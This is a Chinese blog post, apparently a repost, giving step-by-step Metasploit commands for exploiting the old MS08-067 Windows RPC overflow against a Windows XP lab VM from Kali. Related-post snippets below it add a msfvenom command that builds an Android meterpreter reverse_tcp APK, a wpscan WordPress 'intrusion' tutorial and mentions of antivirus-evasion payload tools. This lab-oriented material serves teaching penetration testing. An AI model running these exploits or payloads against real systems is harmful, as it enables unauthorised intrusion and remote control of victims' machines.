Kali Linux渗透实战-MS08-067漏洞攻防实战窍门

最新推荐文章于 2024-08-29 09:37:54 发布

HDX柿子

最新推荐文章于 2024-08-29 09:37:54 发布

阅读量1.1k

点赞数

原文链接：http://bjbsair.com/2020-03-27/tech-info/7088/

版权

感谢参考原文-http://bjbsair.com/2020-03-27/tech-info/7088.html
Kali Linux渗透实战篇【二】：复现MS08-067漏洞攻防实战技巧

一、MS08-067是什么

MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”，如果用户在受影响的系统上收到特制的 RPC 请求，则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击，目前已经有利用该漏洞的蠕虫病毒。

二、影响操作系统

Windows 2000

WindowsXP

Windows Server 2003

Windows Vista

Windows Server 2008

Windows 7 Pro-Beta。

三、漏洞利用工具

Kali Linux

四、渗透环境准备

1、一台Kali Linux虚拟机，扮演黑客，地址为:192.168.123.128

2、一台Windows xp虚拟机，扮演受害者，地址为:192.168.123.100

保证两者网络连通，可试ping一下，不丢包则表示网络连通性良好。

五、渗透测试实战

1、打开postgresql数据库服务器

service postgresql start

初始化数据库

msfdb init

2、进入MSF终端

输入:msfconsole

3、搜索漏洞模块的名称和信息

search ms08-067

4、加载漏洞模块

use + 漏洞模块

5、列出该漏洞模块下可以使用的载荷

show payloads

6、设置攻击载荷

set payload + 载荷名称

7、显示配置选项

show options

8、设置目标地址

set RHOST + IP地址

9、设置本地地址

set LHOST + IP地址

10、列出所有支持的目标平台

show targets

11、选择靶机

set target + 数值

12、执行攻击

run

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

HDX柿子

关注关注

0
点赞
踩
8

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

kali linux 入侵教程,kali linux 入侵wordpress! wpscan工具使用方法！

weixin_36068015的博客

05-03

1484

最近经常遇到wordpress博客站，猛然间想起kalilinux中收录了一个强大的wordpress 利用工具！经验心得如下！这个工具无法直接用命令，需要进入到usr/bin文件夹中运行！第一步，打开终端输入cd /usr/bin第二步，运行wpscan在usr/bin 终端中输入命令。 wpscan -hHelp :Some values are settable in conf/brows...

kali linux 入侵教程,kali linux 入侵wordpress wpscan工具使用方法

weixin_35125814的博客

05-03

1679

最近经常遇到wordpress博客站，猛然间想起kali linux中收录了一个强大的wordpress 利用工具！经验心得如下！这个工具无法直接用命令，需要进入到usr/bin文件夹中运行！第一步，打开终端输入cd /usr/bin第二步，运行wpscan在usr/bin 终端中输入命令。 wpscan -hHelp :Some values are settable in conf/brows...

参与评论您还未登录，请先登录后发表或查看评论

Kali Linux安全渗透教程全

07-07

偶然看到Kali Linux上架win10商店了，所以特意传上来给一些初学者学的

ms08_067攻击实验

weixin_30908941的博客

04-16

126

ms08_067攻击实验 ip地址开启msfconsole 使用search ms08_067查看相关信息使用 show payloads ，确定攻击载荷选择playoad，并查看相关信息设置好监听ip,监听端口以及攻击ip 显示可以被攻击的靶机的操作系统型号发起攻击查看靶机地址创建文件夹查看转载于:https://www.cnblogs.co...

信息系统安全——基于 KALI 和 Metasploit 的渗透测试

最新发布

qq_53058639的博客

08-29

1039

实验 2 基于 KALI 和 Metasploit 的渗透测试2.1 实验名称《基于 KALI 和 Metasploit 的渗透测试》2.2 实验目的1 、熟悉渗透测试方法2 、熟悉渗透测试工具 Kali 及 Metasploit 的使用2.3 实验步骤及内容**** 、安装系统**** 、选择**** 中种攻击工具，记录攻击的主要步骤和攻击结果截图。攻击一：使用复现“永恒之蓝”漏洞实验环境：Win7（关闭防火墙，开启 SMB 服务）；1 启动 Metasploit。

kali Linux渗透测试教程.pdf

liberline的博客

12-31

4997

一本kali Linux渗透测试教程.pdf送上，希望各位技术爱好者在2018年能够学有所成。链接：https://pan.baidu.com/s/1mhZzGGK 密码：969k

Kali Linux VMware（kali-linux-2022.2-vmware-amd64.part2.rar)

06-14

Kali Linux VMware（kali-linux-2022.2-vmware-amd64.7z）文件分割成 3个压缩包，必须集齐3个文件后才能一起解压一起使用： kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...

Kali Linux VMware（kali-linux-2022.2-vmware-amd64.part1.rar)

06-14

kali-linux-08-06-2019.rar

06-03

kali-linux的最小集合安装包，他只包含了必要的组件，轻巧，简约。适合自定义安装。kali-linux，安全工作者和黑客的必备工具系统。如果你想成为网络安全工作者，或是想学习黑客知识。它将是你的好伙伴。

Kali Linux VMware（kali-linux-2022.2-vmware-amd64.part3.rar）

06-14

kali-linux-2023.3-vmware-amd64.part3.rar

10-13

kali-linux-2023.3（kali-linux-2023.3-vmware-amd64.7z）适用于VMware系统，文件使用WinRAR分割成四个压缩包，必须一起下载使用: 文件1：https://download.csdn.net/download/weixin_43800734/88423344 文件2：...

KaliLinux安全渗透教程（完整版）

04-26

第 1 章 Lin u x 安全渗透简介 1.1 什么是安全渗透 1.2 安全渗透所需的工具 1.3 K ali Lin u x 简介 1.4 安装 K ali Lin u x 1.5 K ali更新与升级 1.6 基本设置第 2 章配置 K ali Lin u x 2.1 准备内核头文件 2.2 安装并配置 N VIDIA 显卡驱动 2.3 应用更新和配置额外安全工具 2.4 设置 P r o x y C h ain s 2.5 目录加密第 3 章高级测试实验室 3.1 使用 V M w a r e W o r k s t a tio n 3.2 攻击 W o r d P r e s s 和其他应用程序第 4 章信息收集 4.1 枚举服务 4.2 测试网络范围 4.3 识别活跃的主机 4.4 查看打开的端口 4.5 系统指纹识别 4.6 服务的指纹识别 4.7 其他信息收集手段 4.8 使用 M alt e g o 收集信息 4.9 绘制网络结构图第 5 章漏洞扫描 5.1 使用 N e s s u s 5.2 使用 O p e n VA S 第 6 章漏洞利用 6.1 M e t a s ploit a ble 操作系统 6.2 M e t a s ploit 基础 6.3 控制 M e t e r p r e t e r 6.4 渗透攻击应用大学霸 K ali Lin u x 安全渗透教程 2 6.5 7 7.1 7.2 7.3 7.4 8 8.1 8.2 8.3 8.4 8.5 8.6 8.7 8.8 8.9 9 9.1 9.2 9.3 9.4 9.5 9.6 9.7 9.8 6.5 免杀Payload生成工具Veil 第7章权限提升 7.1 使用假冒令牌 7.2 本地权限提升 7.3 使用社会工程学工具包（SET） 7.4 使用SET实施攻击第8章密码攻击 8.1 密码在线破解 8.2 分析密码 8.3 破解LM Hashes密码 8.4 绕过Utilman登录 8.5 破解纯文本密码工具mimikatz 8.6 破解操作系统用户密码 8.7 创建密码字典 8.8 使用NVIDIA计算机统一设备架构（CUDA） 8.9 物理访问攻击第9章无线网络渗透测试 9.1 无线网络嗅探工具Kismet 9.2 使用Aircrack-ng工具破解无线网络 9.3 Gerix Wifi Cracker破解无线网络 9.4 使用Wifite破解无线网络 9.5 使用Easy-Creds工具攻击无线网络 9.6 在树莓派上破解无线网络 9.7 攻击路由器 9.8 Arpspoof工具

kali linux入侵安卓7.0,【教程】metasploit入侵安卓手机

weixin_29232507的博客

05-13

6420

metasploit入侵安卓手机拿shellKALI IP: 192.168.194.1281.生成木马文件msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.194.128 LPORT=5555 R > /root/ma.apk// LHOST = KALI IP 。LPORT = 接收的端口。 /root/ma.apk...

kali之MS08-067漏洞复现

qq_42885246的博客

07-27

332

远程攻击者可以通过发送恶意的RPC请求触发这个溢出，导致完全入侵用户系统，以SYSTEM权限执行任意指令。设置好RHOST和LHOST后，在show options一次，可以看到已经设置好，待触发攻击。现在利用kali的nmap工具对xp系统进行信息搜集看是否存在ms08-067漏洞。使用nmap对靶机端口服务进行扫描，检测目标主机是否存活，以及445端口开放情况。可以看到：目标主机存活(host is up)，且445端口开放。使用run命令开始攻击，如下：已成功渗透攻击靶机到后台。

Kali之MSF的MS08-067漏洞复现详解

qq_53058639的博客

02-26

1393

MS08-067漏洞是2008年的一个特大漏洞，该漏洞目前早已修补。ms08_067漏洞是的著名远程溢出漏洞，它的影响范围非常大，甚至一些vista的系统都会有这个远程溢出的漏洞,主要针对的是windowsWindowsxp下载。

MS08067高危漏洞利用程序测试成功,请注意防护

weixin_30610755的博客

10-30

221

最近Windows暴出MS08067高危漏洞,除Windows2008外几乎所有Windows都不能幸免,有人评论此漏洞危险性堪比"冲击波"等,于是马上找了下此漏洞的资料.此漏洞是由Server服务引起的,我测试用MS08067利用程序能取的Shell的系统有2000,XP,2003,而且只要开445端口的机器成功率非常高,并且大部份Shell都可以看到被其它人入侵过,的确有点恐怖...总结了下...

kali利用MS08_067简单渗透的过程

只为成最好的自己

08-07

4183

被攻击者IP：192.168.128.149 操作系统：Windows Server 2003 第一步，检测数据库的连接状态： msf > db_status [*] postgresql connected to msf 第二步：开始扫描运行的服务： msf > db_nmap -sS -sV -O -n 192.168.128.149

MS08-067漏洞渗透测试

forget_mt的博客

03-28

9655

提示：靶机 windows XP IP：172.16.5.27 攻击机 kali IP：172.16.5.28 文章目录前言漏洞介绍 nmap扫描 MS08-067利用总结前言利用msfconsole控制台的exploit/windows/smb/ms08_067_netapi攻击模块对靶机445端口的攻击过程，成功进入后渗透，开启靶机的3389远程登录漏洞介绍: ms08_067漏洞是的著名...

MS08-067漏洞攻击的防范

Mashuwei

12-15

1829

MS08-067漏洞来临，你准备好了吗？原创：老板MS08-067：补丁号：KB958644漏洞描述：Server 服务中的漏洞可能允许远程代码执行。远程溢出演示，让我们看看我们的机子是如何轻易的成为人家的肉鸡，被控制的：1.漏洞主机扫描。使用专业端口扫描工具扫描445端口。获取可溢出的主机列表。如下图：2.MS08-067溢出工具进行主机溢出，格式 ms08-067.exe ip 溢出成功标志